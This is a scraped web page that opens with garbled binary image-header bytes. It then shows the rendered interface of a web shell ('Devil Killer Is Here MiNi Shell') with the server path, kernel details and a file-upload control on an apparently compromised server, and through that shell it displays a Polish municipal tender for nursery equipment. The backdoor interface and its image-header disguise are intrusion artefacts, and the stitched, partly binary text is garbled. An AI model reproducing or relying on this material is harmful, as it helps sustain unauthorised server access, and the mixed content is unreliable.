JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190705/570276-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 570276-N-2019 z dnia 2019-07-05 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Świeszyno</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Dostawa wyposażenia do żłobka w m. Konikowo".</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Projekt pn. ,,Rynek pracy dostępny dla rodziców - Gmina Świeszyno stawia na żłobek!" realizowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2014-2020, Działanie 6.6. Program zapewnienia i zwiększenia dostępu do opieki nad dziećmi w wieku do lat 3</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Świeszyno</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">33092070700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Świeszyno</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">71</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">76-024</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Świeszyno</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">94 31 60 120</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">e.jacewicz@swieszyno.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">94 31 61 491</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://ug.swieszyno.ibip.pl/public/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://ug.swieszyno.ibip.pl/public/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://ug.swieszyno.ibip.pl/public/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Świeszyno, Świeszyno 71, 76-024 Świeszyno, Biuro Obsługi Interesantów</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Dostawa wyposażenia do żłobka w m. Konikowo".</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.157.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">wszystkie części</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa wyposażenia wraz z montażem do żłobka ,,Tęczowa Kraina" w miejscowości Konikowo, gmina Świeszyno.Zamawiający dopuszcza składanie ofert częściowych, na każdą z następujących części zamówienia oddzielnie lub łącznie na wszystkie:Część 1. Wyposażenie łazienek.Kody CPV: 39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czystości; 44410000-7 - Artykuły łazienkowe i kuchenneDostawa wyposażenia do łazienek wraz z montażem:1. Zakup wyposażenia łazienek z montażem- Dozownik na papier - 4 szt.2. Zakup wyposażenia łazienek z montażem- Dozownik mydła w płynie - 6 szt. 3. Zakup wyposażenia łazienek z montażem- Dozownik na ręczniki papierowe - 6 szt.4. Zakup wyposażenia łazienek z montażem- Kosz na śmieci z ruchomą pokrywką - 6 szt. 5. Zakup wyposażenia łazienek z montażem- kosz na śmieci - zwierzątko - 3 szt. 6. Zakup wyposażenia łazienek z montażem- kosz na pieluchy - 1 szt.7. Zakup wyposażenia łazienek z montażem- lustro - 4 szt. 8. Zakup wyposażenia łazienek z montażem- szczotka toaletowa - 4 szt. Część 2. Wyposażenie pomieszczeń (sale zabaw, sypialnie, magazynek, pokój dyrekcji, pokój higienistki, pom. socjalne, jadalnia, szatnia).Kody CPV:39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czystości; 39161000-8 - Meble przedszkolne; 39130000-2 - Meble biurowe; 39130000-2 Meble domoweDostawa wyposażenie do pomieszczeń (sale zabaw, sypialnie, magazynek, pokój dyrekcji, pokój higienistki, pom. socjalne, jadalnia, szatnia) wraz z montażem:1. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) z montażem - stoliki - 6 szt. 2. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - krzesło z siedziskiem - 16 szt. 3. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - krzesło z siedziskiem - 8 szt. 4. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał wysoki - 1 szt. 5. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - krzesło z pełnym oparciem - 2 szt.6. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał - 2 szt.7. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał - 1 szt. 8. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) -regał - 1 szt. 9. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał wysoki - 2 szt. 10. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - biurko - 2 szt. 11. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał ścienny - 2 szt. 12. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - szafa - 2 szt.13. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - namiot - 1 szt. 14. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - dekoracje ścienne - 1 szt.15. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - tabliczki w kształcie zwierzątek - 1 szt. 16. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - ścianka manipulacyjna - 2 szt. 17. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik na kółkach min. 45 l - 3 szt.18. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - skrzynia na kółkach min. 70 l - 2 szt.19. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik na kółkach min. 29 l - 3 szt.20. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik do przechowywania zabawek min. 12 l - 8 szt.21. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik do przechowywania zabawek min. 30 l - 4 szt.22. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - półko-przewijak - 1 komplet23. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - tablica korkowa - 6 szt.24. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - mata piankowa - zadaniowa - 2 komplety25. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Leżaczek dla dzieci od urodzenia do 18 kg - 5 szt. 26. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Dywan do w rozmiarze 3.00 x 4.00 m - niebieski ocean - 3 szt.27. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Dywan do w rozmiarze 3.00x4.00 m - zielony 2 szt.28. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Ochrona na ściany narożne i narożniki - 4 szt. 29. Zakup wyposażenia pomieszczeń z montażem (jadalnia) - ławeczka do karmienia - 1 szt. 30. Zakup wyposażenia pomieszczeń z montażem (jadalnia) - Stół prostokątny regulowany - 8 szt.31. Zakup wyposażenia pomieszczeń z montażem (jadalnia) - Krzesło z siedziskiem i oparciem, Wysokość siedziska 31 cm - 20 szt.32. Zakup wyposażenia pomieszczeń z montażem (jadalnia) -Krzesło z siedziskiem i oparciem, Wysokość siedziska 26 cm - 12 szt.33. Zakup wyposażenia pomieszczeń z montażem (jadalnia) -Kredens na kółkach - biały - 2 szt. 34. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Tablica Magnetyczna - 2 szt.35. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Pojemniki do segregacji odpadów - 1 kpl.36. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Mata wejściowa 1 - 1 szt. 37. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Mata wejściowa 2 - 1 szt. 38. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - dziecięcy leżaczek - 5 szt.39. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Łóżeczko dla niemowlaka - 2 szt.40. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Materac do łóżeczka niemowlęcego - 2 szt. 41. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Pokrowiec na leżaczki - 3 szt.42. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Łóżeczko jasnoniebieskie - 24 szt.43. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Łóżeczko żółte (leżaczek) - 24 szt.44. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Materace bawełniane - kolor niebieski - 24 szt.45. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Materace bawełniane - kolor żółty - 24 szt.46. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Metalowa konstrukcja pozwalająca na łatwe przemieszczanie łóżeczek - 3 szt. 47. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Szafa na pościel i 8 materacy - 6 szt. 48. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Biblioteczka - 2 szt.49. Zakup wyposażenia pomieszczeń z montażem (sypialnia) - Fotel - 2 szt.50. Zakup wyposażenia pomieszczeń z montażem(szatnia) - Wieszak podwójny - 48 szt.51. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Wieszak na ubrania - 3 szt. 52. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Szafki do szatni - 48 szt. 53. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Siedzisko - 2 szt.54. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Aluminiowa rama zatrzaskowa - 6 szt.55. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Kosz na śmieci - 1 szt.56. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Ławka tapicerowana - 1 szt.57. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Przewijak wolnostojący - 1 szt. 58. Zakup wyposażenia pomieszczeń z montażem (pom. socjalne) - zamykana szafka - 5 szt.59. Zakup wyposażenia pomieszczeń z montażem (pom. socjalne) - krzesła - 4 szt.60. Zakup wyposażenia pomieszczeń z montażem (pom. socjalne) - stolik okrągły - 1 szt.61. Zakup wyposażenia pomieszczeń z montażem (magazynek) - regał 1 - 1 szt.62. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - regał 2 - 1 szt. 63. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - kozetka - 1 szt.64. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - szafa na cokole - 1 szt.65. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - szafa 2-drzwiowa - 1 szt.66. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - biurko - 1 szt.67. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - krzesło - 1 szt.68. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - krzesło - 1 szt.69. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - biurko narożne 1 szt. 70. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - szafa ubraniowa biurowa duża - 1 szt. 71. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - szafa biurowa regał z półkami - 1 szt.72. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - szafa biurowa niska - 1 szt. 73. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - regał biurowy 1 - 1 szt. 74. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - regał biurowy 2 - 1 szt.75. Zakup wyposażenia pomieszczeń (pokój dyrekcji) - szafka biurowa - 1 szt.76. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - stolik biurowy okrągły - 1 szt.77. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - białe krzesło biurowe - 2 szt.Część 3 - Wyposażenie zaplecza kuchennegoKody CPV:39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czystości; Kody CPV: 39710000-2 - Elektryczny sprzęt gospodarstwa domowegoDostawa wyposażenia do zaplecza kuchennego wraz z montażem:1. Wózek 3-półkowy - 1 szt.2. Wózek 2-półkowy - 1 szt.3. Podgrzewacz do posiłków - 1 szt.4. Lodówka - 1 szt.Część 4 - Pozostałe wyposażenie Kody CPV: CPV:39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czystości; 31515000-9 - Lampy ultrafioletowe; 34911100-7 - Wózki.Dostawa pozostałego wyposażenia wraz z montażem:1. Pozostałe wyposażenie - lampa bakteriobójcza - 2 szt. 2. Pozostałe wyposażenie - wózek 6-osobowy - 1 komplet3. Pozostałe wyposażenie -wózek 4-osobowy - 1 komplet4. Pozostałe wyposażenie - parawan żłobkowy narożny - 1 kompletCzęść 5 - Dostawa sprzętu komputerowego, multimedialnego i elektronicznego.Kody CPV: 32000000-3 - Sprzęt radiowy, telewizyjny, komunikacyjny, telekomunikacyjny i podobny; 30200000-1 Urządzenia komputeroweDostawa sprzętu komputerowego, multimedialnego i elektronicznego wraz z montażem:1. Urządzenie Wielofunkcyjne - 1 komplet2. Drukarka laserowa - 1 komplet3. Laptop - 2 komplety4. Zestaw nagłaśniający - 1 komplet5. Zestaw multimedialny - 1 komplet	Szczegółowy opis przedmiotu zamówienia został określony w SIWZ oraz w załączniku nr 1 do niniejszej specyfikacji, który należy załączyć do oferty po uzupełnieniu przez Wykonawcę cen (w zależności od części zamówienia, której dotyczy oferta).Przedmiot zamówienia obejmuje również montaż całego wyposażenia. Wraz z dostawą Wykonawca ma obowiązek przekazania Zamawiającemu komplety atestów, certyfikatów i kart gwarancyjnych, skompletowanych w dwóch 2 egz. (oryginały i kopie). 